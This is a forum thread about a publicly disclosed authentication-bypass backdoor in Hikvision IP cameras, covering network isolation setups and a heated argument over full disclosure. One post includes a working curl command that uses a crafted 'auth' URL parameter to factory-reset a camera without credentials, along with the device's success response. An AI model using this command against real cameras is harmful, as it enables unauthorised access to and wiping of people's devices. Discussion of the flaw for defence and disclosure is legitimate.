Backdoor found in Hikvision cameras

Geez. I found this thread via a thread about the hikvision cube clone (which i just bought a month ago).

I have Ubiquiti Unifi gear. the BI PC is on VLAN2 with no access to my main LAN. My IP camera group on VLAN2 is blocked from access WAN and my main LAN (cannot ping out to WAN or to LAN1). The cameras get their time from my BI PC using the nettime app. The BI PC only runs my cameras.

Does this sound safe? I have not touched the firmware on my 8 cameras in a while.

That's why you went to all of that trouble. You can't trust any of these cams. Or many other devices either for that matter.
 
they are not...they either have to put a bit of effort into learning how (as you have shown, its not that difficult) or hire someone...those same folks wouldn't dare run electrical wiring themselves....so they should hire someone for this as well..
And sadly plenty of the people you can hire are a bit clueless when it comes to security.
 
  • Like
Reactions: fenderman
And sadly plenty of the people you can hire are a bit clueless when it comes to security.

We have a client that is the absolute opposite. Palo Alto Next Generation firewalls at every facility. They really aren't very worried about holes in NVRs or cams.

All remote access is done via VPN, nor ports. And the firewall is on top of any strange traffic immediately. Palo Alto stuff is NOT cheap. But when properly configured, it adds a HUGE layer of security to cams and other IOT stuff that very few are employing.

Honestly, this client has taught us a LOT.
 
  • Like
Reactions: ovexi and gvmelbrty
Fancy firewalls are great at breaking legitimate apps whenever they do anything more than a plain, cheap NAT router would. But they do have their place.
 
  • Like
Reactions: gvmelbrty
Details published yesterday in the full disclosure mailing list. Peeping toms and botnet herders are probably celebrating.

Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass but did you actually test ones like the factoryReset one? From what I can see only the ones that are normally called by GET appear vulnerable and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!
 
Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass but did you actually test ones like the factoryReset one? From what I can see only the ones that are normally called by GET appear vulnerable and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!

That indeed working on my IPC DS-2CD2020F

$ curl -X PUT -v http://192.168.5.20/System/factoryDefault?auth=YWRtaW46MTEK
* Hostname was NOT found in DNS cache
* Trying 192.168.5.20...
* Connected to 192.168.5.20 (192.168.5.20) port 80 (#0)
> PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.5.20
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 17 Sep 2017 11:31:01 GMT
* Server App-webs/ is not blacklisted
< Server: App-webs/
< Connection: close
< Content-Length: 257
< Content-Type: application/xml
<
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="Oops:The page you are visiting may have been deleted,renamed or inaccessible.">
<requestURL>/System/factoryDefault</requestURL>
<statusCode>7</statusCode>
<statusString>Reboot Required</statusString>
</ResponseStatus>
* Closing connection 0
$
 
I guess my cameras are not affected (DS-2CD3132-I).

But if my NVR with POE ports built into it has a different a LAN for cameras (e.g. 192.168.254.13) from my main network (e.g. 192.168.1.1, only my NVR connects to this network & it doesn't support virtual hosting for cameras) that connected to the internet I should have to worry about anything?

The only way I can reach my camera web GUI is by connecting into a free POE port on the NVR and changing my PC LAN to match the NVR LAN.

Thanks.
 
I guess my cameras are not affected (DS-2CD3132-I).

But if my NVR with POE ports built into it has a different a LAN for cameras (e.g. 192.168.254.13) from my main network (e.g. 192.168.1.1, only my NVR connects to this network & it doesn't support virtual hosting for cameras) that connected to the internet I should have to worry about anything?

The only way I can reach my camera web GUI is by connecting into a free POE port on the NVR and changing my PC LAN to match the NVR LAN.

Thanks.
you are assuming that the NVR does not have any vulnerabilities...it likely has many...
 
you are assuming that the NVR does not have any vulnerabilities...it likely has many...

Oh, I'm sure it has vulnerabilities. People just haven't found them yet & made public. When electronics come here on the slow boat from China I always suspect some kind of manufacture backdoor.

In the future I'll probably be doing a BI or Milestone build. Or upgrade my HTPC with dual Xeon and run it on that.
 
Oh, I'm sure it has vulnerabilities. People just haven't found them yet & made public. When electronics come here on the slow boat from China I always suspect some kind of manufacture backdoor.

In the future I'll probably be doing a BI or Milestone build. Or upgrade my HTPC with dual Xeon and run it on that.
you should run any vms on a dedicated pc....
 
Montecrypto - why the hell you published this? I knew about this 2 years ago but knew that publishing this will make get things worse.
To be honest - we are both "rev engs" but disclosing this kind of info to the public will screw a lot of hardware and create a lot of chaos.
Even on this board. Are you happy? I'm not.
Btw. there is also heap overflow - will be fixed soon but i will not disclose it as you do. Sorry.
Job is a job, fun is a fun, but this is insane.
 
If you knew about this 2 years ago then why did it take Hikvision until January 2017 (about 9 months ago) to publish firmware with it fixed?

Disclosing vulnerabilities like this is standard practice, to get manufacturers and software vendors to take threats seriously, among other reasons.
 
2 years is a little too big - time is running.
You dont understand HOW EASY is to use it using Shodan.io platform by script-kiddies just for fun now.
This bug will not hit HUGE CCTV closed systems but poor poeple who want to have a view on their homes.
And no, this is not the good way of pushing Manufacturers to treat you seriosusly.
I dont have this kind of problems with HikVision NOR Dahua.
 
Montecrypto - why the hell you published this? I knew about this 2 years ago but knew that publishing this will make get things worse.
To be honest - we are both "rev engs" but disclosing this kind of info to the public will screw a lot of hardware and create a lot of chaos.
Even on this board. Are you happy? I'm not.
Btw. there is also heap overflow - will be fixed soon but i will not disclose it as you do. Sorry.
Job is a job, fun is a fun, but this is insane.
He was forced to disclose it to get hikvision to take action....even if we believe your story that you knew about this vulnerability, do you think you two were the only ones? The public has a right to know....
 
  • Like
Reactions: Bink
What? Hikvision CREATED and upgrade to their FW right? So why HE HAD TO?
Nevermind - you don't understand a clue of my story.
I always published info that wont hurt anybody on this board.
The public has a right to know THAT MERCEDES CAN BE STEALED BY KID and not with INSTRUCTION ON TV HOW TO STEAL A MERCEDES CAR that even KID can use. That's the difference.
Ok, nevermind....
 
What? Hikvision CREATED and upgrade to their FW right? So why HE HAD TO?
Nevermind - you don't understand a clue of my story.
I always published info that wont hurt anybody on this board.
The public has a right to know THAT MERCEDES CAN BE STEALED BY KID and not with INSTRUCTION ON TV HOW TO STEAL A MERCEDES CAR that even KID can use. That's the difference.
Ok, nevermind....
Wrong...this kind of stuff will force manufactures to take security seriously...they will get a shitload of complaints...from dealers, end users, bad publicity...
Let me ask you this, please show me where hikvision has notified dealers and end users of this exploit, its missing from their press release pages...
 
  • Like
Reactions: Bink and giomania